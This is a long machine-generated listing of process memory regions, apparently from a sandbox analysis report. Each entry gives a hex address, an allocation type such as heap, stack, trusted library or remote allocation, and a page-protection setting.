trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
7FE0000
unkown
page read and write
8A3C000
direct allocation
page read and write
2C10000
trusted library allocation
page read and write
1A55C9A8000
heap
page read and write
9490000
trusted library allocation
page read and write
FC3000
heap
page read and write
55B4000
heap
page read and write
4DC0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8FC0000
trusted library allocation
page read and write
484E000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
571C000
stack
page read and write
5D0F000
trusted library allocation
page read and write
1C1B0C20000
heap
page read and write
90A0000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
8BFD000
trusted library allocation
page read and write
6E97000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
4D7F000
stack
page read and write
7FE0000
unkown
page read and write
9160000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
4FE0000
heap
page read and write
4DF8000
trusted library allocation
page read and write
80FF000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9140000
trusted library allocation
page read and write
9110000
unkown
page read and write
4E00000
trusted library allocation
page read and write
1A55C9DA000
heap
page read and write
9080000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9560000
trusted library allocation
page read and write
9120000
unkown
page read and write
75D0000
trusted library allocation
page read and write
5103000
trusted library allocation
page read and write
4C80000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
94A5000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
4BE0000
direct allocation
page read and write
5615000
trusted library allocation
page read and write
8FCF000
trusted library allocation
page read and write
9167000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
8ED7000
trusted library allocation
page read and write
29D5D3B0000
heap
page read and write
7550000
unkown
page read and write
1A55C9AA000
heap
page read and write
9125000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
91C0000
trusted library allocation
page read and write
8264000
trusted library allocation
page read and write
1A55C97E000
heap
page read and write
9060000
trusted library allocation
page read and write
2C00000
heap
page read and write
9F40000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
82A0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
4D80000
heap
page read and write
1A55CE00000
heap
page read and write
8F70000
trusted library allocation
page read and write
6C2F000
direct allocation
page read and write
9090000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
5B0A000
trusted library allocation
page read and write
5146000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
6E49000
trusted library allocation
page read and write
9F58000
trusted library allocation
page read and write
4DBE000
stack
page read and write
2D611320000
heap
page read and write
4E70000
trusted library allocation
page read and write
4E5E000
unkown
page read and write
9000000
unkown
page read and write
74F6000
direct allocation
page read and write
94A0000
trusted library allocation
page read and write
9FC0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
8EF0000
trusted library allocation
page read and write
7501000
direct allocation
page read and write
90A0000
trusted library allocation
page read and write
1C151258000
heap
page read and write
9FC0000
trusted library allocation
page read and write
9F30000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9470000
trusted library allocation
page read and write
586C000
trusted library allocation
page read and write
21CB2C60000
heap
page read and write
1F8A6250000
heap
page read and write
AD9000
heap
page read and write
9090000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9140000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
6E1B000
trusted library allocation
page read and write
8B90000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
1A55C997000
heap
page read and write
8230000
trusted library allocation
page read and write
6840000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
5DBA000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
75F6000
trusted library allocation
page read and write
28267713000
heap
page read and write
1C1B0E56000
heap
page read and write
9090000
trusted library allocation
page read and write
6E7E000
trusted library allocation
page read and write
7FE0000
unkown
page read and write
9480000
trusted library allocation
page read and write
21DD6670000
heap
page read and write
29D5D502000
heap
page read and write
1A55C200000
heap
page read and write
483E000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
9040000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
9170000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
8BB8000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
6E69000
trusted library allocation
page read and write
4F30000
trusted library allocation
page read and write
EEC000
stack
page read and write
6E40000
trusted library allocation
page read and write
9070000
trusted library allocation
page read and write
9220000
unkown
page read and write
4D3F000
heap
page read and write
59E2000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
8210000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
90A5000
trusted library allocation
page read and write
4B2F000
heap
page read and write
2C10000
trusted library allocation
page read and write
4CF0000
trusted library allocation
page readonly
5113000
trusted library allocation
page read and write
9250000
trusted library allocation
page read and write
9000000
unkown
page read and write
1A55C9A8000
heap
page read and write
6B54000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
6E30000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9230000
trusted library allocation
page read and write
7DFACF7000
stack
page read and write
5995000
trusted library allocation
page read and write
6230000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
1C156AFC000
heap
page read and write
9235000
trusted library allocation
page read and write
9FE7000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
5DC1000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
8FC0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
5120000
heap
page read and write
7FE0000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
4B12000
heap
page read and write
1C1B0E75000
heap
page read and write
9090000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
9B0000
heap
page read and write
8CEE000
stack
page read and write
81F0000
trusted library allocation
page read and write
81F0000
unkown
page read and write
9291000
trusted library allocation
page read and write
1C1B0C80000
heap
page read and write
1C156A2F000
heap
page read and write
1C27D271000
heap
page read and write
8F20000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
75D0000
unkown
page read and write
2CD0000
remote allocation
page read and write
8200000
trusted library allocation
page read and write
8BD5000
trusted library allocation
page read and write
90E0000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
1F8A6A02000
trusted library allocation
page read and write
2DC0000
unkown
page readonly
6741000
trusted library allocation
page read and write
9FB0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9070000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
6B70000
direct allocation
page read and write
2CE0000
remote allocation
page execute and read and write
75D7000
unkown
page read and write
4D77000
heap
page read and write
2C60000
trusted library allocation
page read and write
9490000
unkown
page read and write
9150000
trusted library allocation
page read and write
6A21000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
5EF2000
trusted library allocation
page read and write
1F8A6190000
heap
page read and write
553D000
heap
page read and write
8F50000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
7FE0000
trusted library allocation
page read and write
5A42000
trusted library allocation
page read and write
504F977000
stack
page read and write
9353000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
21DD6620000
heap
page read and write
2CE0000
remote allocation
page execute and read and write
1A55C2F0000
heap
page read and write
9090000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
59D6000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
9330000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9080000
trusted library allocation
page read and write
1C15127A000
heap
page read and write
7590000
trusted library allocation
page read and write
1037000
heap
page read and write
1C27D22D000
heap
page read and write
6041000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
7000000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
60F1000
trusted library allocation
page read and write
1A55C97F000
heap
page read and write
75C0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
5549000
heap
page read and write
75D0000
unkown
page read and write
59D2000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
55AE000
heap
page read and write
9030000
trusted library allocation
page read and write
4B00000
heap
page read and write
6DED000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
2CD0000
remote allocation
page read and write
9290000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
1C1511D0000
heap
page read and write
6640000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
82A0000
trusted library allocation
page read and write
7DFA6DB000
stack
page read and write
9190000
trusted library allocation
page read and write
2F21000
heap
page read and write
6E4D000
trusted library allocation
page read and write
8B60000
heap
page read and write
92F0000
trusted library allocation
page read and write
4E70000
trusted library section
page read and write
9140000
trusted library allocation
page read and write
1C1B0E5A000
heap
page read and write
75B0000
trusted library allocation
page read and write
5A5B000
trusted library allocation
page read and write
94E0000
unkown
page read and write
75F0000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
553E000
heap
page read and write
9FA0000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
70C0000
trusted library allocation
page read and write
8BAE000
trusted library allocation
page read and write
1C1512B1000
heap
page read and write
4868000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
4AFF000
stack
page read and write
4FFD000
stack
page read and write
9190000
trusted library allocation
page read and write
558F000
heap
page read and write
6FF0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
2D3D000
stack
page read and write
92B0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
83EC0FE000
stack
page read and write
21DD66AF000
heap
page read and write
9470000
trusted library allocation
page read and write
656C000
trusted library allocation
page read and write
1C156AA3000
heap
page read and write
64EB000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
2D611390000
heap
page read and write
BBA77FB000
stack
page read and write
6E0A000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
75D5000
trusted library allocation
page read and write
7570000
direct allocation
page read and write
5AC1000
trusted library allocation
page read and write
5590000
heap
page read and write
2D611400000
heap
page read and write
5142000
trusted library allocation
page read and write
7FD5000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
75D0000
unkown
page read and write
4ECD000
stack
page read and write
90D0000
trusted library allocation
page read and write
4DAA000
heap
page read and write
90A0000
trusted library allocation
page read and write
6E7A000
trusted library allocation
page read and write
7FE5000
unkown
page read and write
1C152690000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
4D76000
heap
page read and write
58D6000
trusted library allocation
page read and write
91E0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
1A55C26F000
heap
page read and write
4F6F000
stack
page read and write
75D0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
EA1000
stack
page read and write
9279000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
21CB2BB0000
heap
page read and write
5B78000
trusted library allocation
page read and write
9370000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
6E5D000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
28267687000
heap
page read and write
90C0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
6E79000
trusted library allocation
page read and write
7120000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
8EC5000
trusted library allocation
page read and write
53B6000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
9C8E000
unkown
page read and write
504FCFF000
stack
page read and write
5902000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
AF32000
unkown
page read and write
2CD0000
remote allocation
page read and write
7E0000
heap
page read and write
9070000
unkown
page read and write
90D0000
trusted library allocation
page read and write
484C000
trusted library allocation
page read and write
4DDE000
unkown
page read and write
9230000
trusted library allocation
page read and write
7000000
trusted library allocation
page read and write
9250000
trusted library allocation
page read and write
8213000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
1C1B0E29000
heap
page read and write
94C0000
trusted library allocation
page read and write
8220000
trusted library allocation
page read and write
4C4D000
unkown
page read and write
5598000
heap
page read and write
1C151B13000
heap
page read and write
9120000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
2FF0000
unkown
page readonly
8A01000
direct allocation
page read and write
6C24000
direct allocation
page read and write
7FE0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9FA0000
trusted library allocation
page read and write
7FE8000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
55C0000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
4D76000
heap
page read and write
21CB2C89000
heap
page read and write
9050000
trusted library allocation
page read and write
94B5000
trusted library allocation
page read and write
1C156AE9000
heap
page read and write
8215000
trusted library allocation
page read and write
487C000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
2C60000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
1C156980000
trusted library allocation
page read and write
4DD0000
trusted library allocation
page execute and read and write
7FE0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
4B70000
heap
page read and write
9290000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
9F20000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
2C30000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
8F53000
trusted library allocation
page read and write
90E0000
trusted library allocation
page read and write
5843000
trusted library allocation
page read and write
1A55C98D000
heap
page read and write
ABE0000
trusted library allocation
page read and write
1A55C9D6000
heap
page read and write
9210000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
59D6000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
4D96000
heap
page read and write
75F0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
ABD557E000
stack
page read and write
7FD0000
trusted library allocation
page read and write
21DD6681000
heap
page read and write
8F35000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
CDD1DFE000
stack
page read and write
4C8E000
unkown
page read and write
8F20000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
9F80000
trusted library allocation
page read and write
55EF000
stack
page read and write
4B5D000
heap
page read and write
93E0000
trusted library allocation
page read and write
1C151930000
trusted library allocation
page read and write
6E3E000
trusted library allocation
page read and write
28267F12000
heap
page read and write
9270000
trusted library allocation
page read and write
6E27000
trusted library allocation
page read and write
28267470000
heap
page read and write
9120000
trusted library allocation
page read and write
529F000
stack
page read and write
1A55C990000
heap
page read and write
8EE0000
trusted library allocation
page read and write
9FB0000
trusted library allocation
page read and write
5148000
trusted library allocation
page read and write
5A3A000
trusted library allocation
page read and write
9FA8000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
94D0000
trusted library allocation
page read and write
81F0000
unkown
page read and write
8F00000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
5A3E000
trusted library allocation
page read and write
8BB3000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
8260000
trusted library allocation
page read and write
595E000
trusted library allocation
page read and write
9500000
trusted library allocation
page read and write
6E8A000
trusted library allocation
page read and write
C87A67C000
stack
page read and write
A1C000
heap
page read and write
1A55CD90000
remote allocation
page read and write
480F000
stack
page read and write
9F20000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
59E2000
trusted library allocation
page read and write
21CB2D02000
heap
page read and write
75D0000
heap
page read and write
81F0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
9F46000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
7FD0000
unkown
page read and write
8270000
trusted library allocation
page read and write
BF6000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
9056000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
6DF2000
trusted library allocation
page read and write
1A55C924000
heap
page read and write
55B4000
heap
page read and write
6C04000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9F50000
trusted library allocation
page read and write
7FD9000
unkown
page read and write
2C80000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
8A70000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
1C1522D0000
trusted library section
page readonly
90A0000
trusted library allocation
page read and write
9506000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
9340000
trusted library allocation
page read and write
7530000
direct allocation
page read and write
8F40000
trusted library allocation
page read and write
55AE000
heap
page read and write
91A3000
trusted library allocation
page read and write
4D41000
heap
page read and write
7010000
trusted library allocation
page read and write
1A55CE02000
heap
page read and write
9460000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
610000
heap
page read and write
CDD22FE000
stack
page read and write
4B5D000
heap
page read and write
9570000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
4B37000
heap
page read and write
90A0000
unkown
page read and write
75A0000
trusted library allocation
page read and write
1CD000
stack
page read and write
8E90000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
21CB2C52000
heap
page read and write
6E3C000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
9180000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
81F0000
unkown
page read and write
8FC0000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
5575000
heap
page read and write
6E50000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
6E84000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
4F50000
remote allocation
page read and write
2CE0000
remote allocation
page execute and read and write
62ED000
trusted library allocation
page read and write
83EBCFF000
stack
page read and write
2CD0000
remote allocation
page read and write
6E59000
trusted library allocation
page read and write
504FFFF000
stack
page read and write
9F50000
trusted library allocation
page read and write
3E0000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
8270000
trusted library allocation
page read and write
1C27D278000
heap
page read and write
9120000
trusted library allocation
page read and write
45F0000
remote allocation
page read and write
2C60000
trusted library allocation
page read and write
2D6113C0000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
91C0000
trusted library allocation
page read and write
5FBF000
trusted library allocation
page read and write
6CB9000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
4EDE000
stack
page read and write
4ED0000
trusted library allocation
page read and write
1C1522E0000
trusted library section
page readonly
6C39000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
9040000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
9070000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
4E00000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
9121000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
70F0000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
8250000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9070000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9F20000
trusted library allocation
page read and write
7FE5000
trusted library allocation
page read and write
2DDB000
heap
page read and write
586C000
trusted library allocation
page read and write
AA6000
heap
page read and write
75D5000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
21DD6686000
heap
page read and write
6E41000
trusted library allocation
page read and write
511D000
trusted library allocation
page read and write
506447E000
stack
page read and write
4860000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
8FF0000
unkown
page read and write
45F0000
remote allocation
page read and write
8206000
unkown
page read and write
2C17000
trusted library allocation
page read and write
1A55C974000
heap
page read and write
9090000
trusted library allocation
page read and write
4B57000
heap
page read and write
9540000
trusted library allocation
page read and write
75D0000
unkown
page read and write
94A0000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
9165000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
2C40000
trusted library allocation
page execute and read and write
2F21000
heap
page read and write
C879F3B000
stack
page read and write
5549000
heap
page read and write
5586000
heap
page read and write
95B8000
trusted library allocation
page read and write
9180000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
59D6000
trusted library allocation
page read and write
82A5000
trusted library allocation
page read and write
1C156AE3000
heap
page read and write
559D000
heap
page read and write
626E000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page read and write
4D20000
heap
page read and write
70D0000
trusted library allocation
page read and write
6E47000
trusted library allocation
page read and write
45FE000
stack
page read and write
90C4000
trusted library allocation
page read and write
68FF000
trusted library allocation
page read and write
4EB0000
trusted library allocation
page read and write
6BB0000
direct allocation
page read and write
6E14000
trusted library allocation
page read and write
5FE5000
trusted library allocation
page read and write
559D000
heap
page read and write
7FE0000
trusted library allocation
page read and write
75D0000
unkown
page read and write
9120000
trusted library allocation
page read and write
A81000
heap
page read and write
C87ABFF000
stack
page read and write
1F8A6258000
heap
page read and write
474E000
stack
page read and write
5DE000
stack
page read and write
5DB9000
trusted library allocation
page read and write
6E77000
trusted library allocation
page read and write
4E00000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
21DD6640000
heap
page read and write
90A0000
trusted library allocation
page read and write
282675D0000
trusted library allocation
page read and write
1C1512FE000
heap
page read and write
59CB000
trusted library allocation
page read and write
1C156A00000
heap
page read and write
704D000
trusted library allocation
page read and write
59E6000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
59E2000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
4B91000
direct allocation
page read and write
4B6A000
heap
page read and write
9120000
trusted library allocation
page read and write
7000000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
82A0000
trusted library allocation
page read and write
4B51000
heap
page read and write
5845000
trusted library allocation
page read and write
504FDFA000
stack
page read and write
4E9F000
stack
page read and write
8EC0000
trusted library allocation
page read and write
590B000
trusted library allocation
page read and write
482E000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
9570000
trusted library allocation
page read and write
1C27D25E000
heap
page read and write
BF0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
2C30000
trusted library allocation
page read and write
2E20000
trusted library section
page read and write
2CE0000
remote allocation
page execute and read and write
7FE0000
unkown
page read and write
2CD0000
remote allocation
page read and write
9120000
trusted library allocation
page read and write
90D3000
trusted library allocation
page read and write
9FB0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
8F40000
trusted library allocation
page read and write
50501FF000
stack
page read and write
50502FA000
stack
page read and write
90A0000
trusted library allocation
page read and write
91A0000
unkown
page read and write
81F0000
unkown
page read and write
8210000
trusted library allocation
page read and write
4B61000
heap
page read and write
60F7000
trusted library allocation
page read and write
7FE2000
trusted library allocation
page read and write
9B0D77E000
stack
page read and write
2CD0000
remote allocation
page read and write
29D5D413000
heap
page read and write
92F0000
trusted library allocation
page read and write
8255000
trusted library allocation
page read and write
488A000
trusted library allocation
page read and write
4F4F000
unkown
page read and write
8F30000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
4B41000
direct allocation
page read and write
5586000
heap
page read and write
9B0D67A000
stack
page read and write
4D27000
heap
page read and write
8F50000
trusted library allocation
page read and write
1F8A6202000
heap
page read and write
2CD0000
remote allocation
page read and write
683E000
trusted library allocation
page read and write
9FA8000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
8F40000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
567E000
trusted library allocation
page read and write
6902000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
4D2A000
heap
page read and write
81E0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
529E000
trusted library allocation
page read and write
ABD547B000
stack
page read and write
1C151275000
heap
page read and write
2C40000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
5E41000
trusted library allocation
page read and write
1C15128E000
heap
page read and write
9560000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8F20000
trusted library allocation
page read and write
504E000
stack
page read and write
9238000
trusted library allocation
page read and write
8A2C000
direct allocation
page read and write
1C156851000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
545D000
stack
page read and write
6E5C000
trusted library allocation
page read and write
1A55C997000
heap
page read and write
6E70000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
5BC0000
trusted library allocation
page read and write
49F9000
stack
page read and write
2D60000
heap
page read and write
5510000
heap
page read and write
2D67000
heap
page read and write
519E000
stack
page read and write
8205000
trusted library allocation
page read and write
2F10000
heap
page read and write
90A0000
trusted library allocation
page read and write
4BC0000
direct allocation
page read and write
90A0000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
9106000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
51B9000
trusted library allocation
page read and write
1A55C99E000
heap
page read and write
9090000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
8210000
trusted library allocation
page read and write
4A9E000
stack
page read and write
8205000
trusted library allocation
page read and write
9F2D000
trusted library allocation
page read and write
2F03000
heap
page read and write
1A55CE02000
heap
page read and write
932D000
trusted library allocation
page read and write
5851000
trusted library allocation
page read and write
21DD6693000
heap
page read and write
90A0000
trusted library allocation
page read and write
4C70000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
6DE5000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
50FB000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
4E00000
trusted library allocation
page read and write
70D0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
4DB0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
5857000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
1050000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
4C76000
trusted library allocation
page execute and read and write
9F20000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
5DC2000
trusted library allocation
page read and write
4D87000
heap
page read and write
1F8A6950000
trusted library allocation
page read and write
4888000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
7060000
trusted library allocation
page read and write
9170000
trusted library allocation
page read and write
5A3E000
trusted library allocation
page read and write
9F80000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
1A55C2AA000
heap
page read and write
8F10000
trusted library allocation
page read and write
1A55C97E000
heap
page read and write
2CD0000
remote allocation
page read and write
5582000
heap
page read and write
9090000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
6E21000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9450000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
5967000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
4C82000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
8260000
trusted library allocation
page read and write
1A55C302000
heap
page read and write
9540000
trusted library allocation
page read and write
586C000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
4840000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
89D0000
direct allocation
page read and write
9090000
trusted library allocation
page read and write
6880000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
6E4C000
trusted library allocation
page read and write
5861000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
F15997E000
stack
page read and write
4E00000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
9F7000
heap
page read and write
90E0000
trusted library allocation
page read and write
6E8D000
trusted library allocation
page read and write
1A55C790000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
552A000
heap
page read and write
1A55C999000
heap
page read and write
94E4000
trusted library allocation
page read and write
CDD23F7000
stack
page read and write
9460000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
6BD0000
direct allocation
page read and write
8EB0000
